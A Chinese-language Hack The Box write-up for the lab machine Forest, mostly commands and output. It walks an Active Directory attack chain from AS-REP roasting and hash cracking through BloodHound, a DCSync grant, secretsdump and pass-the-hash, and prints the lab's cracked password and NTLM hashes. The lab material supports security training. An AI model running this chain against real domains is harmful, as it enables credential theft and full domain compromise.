0x00 靶场介绍
Forest 是 Hackthebox 上一台 windows 靶机,主要考察域内相关知识。
0x01 端口扫描
nmap扫描找出开放端口
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.161 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
┌──(root💀kali)-[~/hackthebox/Forest]
└─# nmap -sC -sV -p$ports 10.10.10.161 1 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-09 10:42 CST
Nmap scan report for 10.10.10.161
Host is up (0.31s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-09 02:49:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49952/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h26m52s, deviation: 4h02m32s, median: 6m50s
| smb2-time:
| date: 2022-05-09T02:50:04
|_ start_date: 2022-05-06T12:35:13
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2022-05-08T19:50:03-07:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.16 seconds
根据开放端口判断为域内机器,重点关注389、445、5985端口。
0x02 获取域用户及密码
枚举域内用户
└─# rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
将这些 user 存入 uname.txt
使用 impacket 工具爆破以上用户hash
└─# impacket-GetNPUsers htb.local/ -usersfile /root/hackthebox/Forest/uname.txt -dc-ip 10.10.10.161
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:c5eed36b25500542d81e06d9d4557562$7f862dd9d40cda641b6c1eb3f1611ef7c0cb8fcbc046f8b27d35757c275b01a551ab133788022007f3374e5b7d7954a4f0e2686668cdb8289e8afd199e0b590014cd5bd6b7e6fa5ed0084f8a3e9967a550d1f18d2a2970428abc98a5d6f06a0b4548abe158a43d12c87f3f4e9bf26cbf65e65ea6759c94b8e1e8e2bcde261bf2f2531ecf828911868c118ed1bf5d56119638a099569e6c888572807010894670af2768b83d809d028abb57a6a7fdee74c324e4f4a4cc894a3c69c5fc759f80bd3aec3d589872b36cdc9faaaa74adaeca114b8a5860f0dc7b8376476f5f53ff0be8801e29fe4a
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
得到 svc-alfresco 用户的hash,接下来进行 hash 爆破,查询发现hash 类型为 18200
hashcat 1.hash /root/dict/rockyou.txt -m 18200
得到 svc-alfresco 用户的密码为 s3rvice
,使用evil-winrm工具连接,拿到第一个 flag
└─# evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type C:\Users\svc-alfresco\Desktop\user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
0x03 权限提升
域内信息收集
#上传文件
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.ps1
Info: Uploading SharpHound.ps1 to C:\Users\svc-alfresco\Documents\SharpHound.ps1
Data: 1298308 bytes of 1298308 bytes copied
Info: Upload successful!
#运行脚本收集域内信息
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/9/2022 12:31 AM 15178 20220509003131_BloodHound.zip
-a---- 5/9/2022 12:31 AM 23725 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 5/9/2022 12:30 AM 973732 SharpHound.ps1
#下载结果zip
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20220509003131_BloodHound.zip
Info: Downloading 20220509003131_BloodHound.zip to ./20220509003131_BloodHound.zip
Info: Download successful!
将得到的zip 包上传到 bloodhound 进行分析
#neo4j 启动
┌──(root💀kali)-[~/hackthebox/Forest]
└─# neo4j console
#bloodhound 启动
┌──(root💀kali)-[~/tools/BloodHound-linux-x64]
└─# ./BloodHound --no-sandbox 133 ⨯
(node:15772) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
Find Shortest Paths to Domain Admins
从当前 svc-alfresco 的访问权限到 Domain Admins 组中的 Adminsitrator 需要两个步骤。
1)svc-alfresco 用户在 Service Account 中,它是 Privileged IT Account 的成员,它是 Account Operators 的成员,所以svc-alfresco 用户是 Account Operators 的成员,并且 Account Operators 对 Exchange Windows Permissions 组具有 Generic All 特权。
解释:Account Operators 组授予用户有限的帐户创建权限。该组的成员可以创建和修改大多数类型的帐户,包括用户、本地组和全局组的帐户,并且成员可以本地登录到域控制器。所以可以新建一个abc用户并加入 "Exchange Windows Permissions"组。
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user abc abc123! /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" abc /add
The command completed successfully.
2)组 EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL 的成员有权修改域 HTB.LOCAL 上的 DACL(自由访问控制列表)。通过对目标对象的 DACL 的写入访问权限,您可以授予对对象的任何所需权限。这里是为abc用户赋予DCSync权限,利用DCSync导出域内所有用户hash。
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'abc123!' -AsPlain -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\abc', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
#为了Add-DomainObjectAcl 命令可以执行,导入PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -PrincipalIdentity abc -Credential $Cred -Rights DCSync
域内用户hash值获取
└─# impacket-secretsdump htb.local/abc@10.10.10.161
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
daniel:9601:aad3b435b51404eeaad3b435b51404ee:79aa8f83793ca58c378d2b153c42f843:::
dunk:9602:aad3b435b51404eeaad3b435b51404ee:43b407d70f87a40f5884add1cc8316ad:::
abc:9603:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:dc3afd678336c8f5b373400bda3e7032:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
哈希传递攻击
利用wmiexec进行PTH
└─# impacket-wmiexec htb.local/administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 1 ⨯
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
htb\administrator
C:\>type C:\Users\administrator\Desktop\root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
拿到 root flag值
0x04 遇到的问题
1.域内信息收集建议使用 sharphound.ps1,这样比blood-python收集的信息更完整。
2.bloodhound安装版本为4.0.3 可以解析域内信息收集json文件,bloodhound 4.1.0版本解析失败。
3.$SecPassword 密码记得与新建用户的密码保持一致。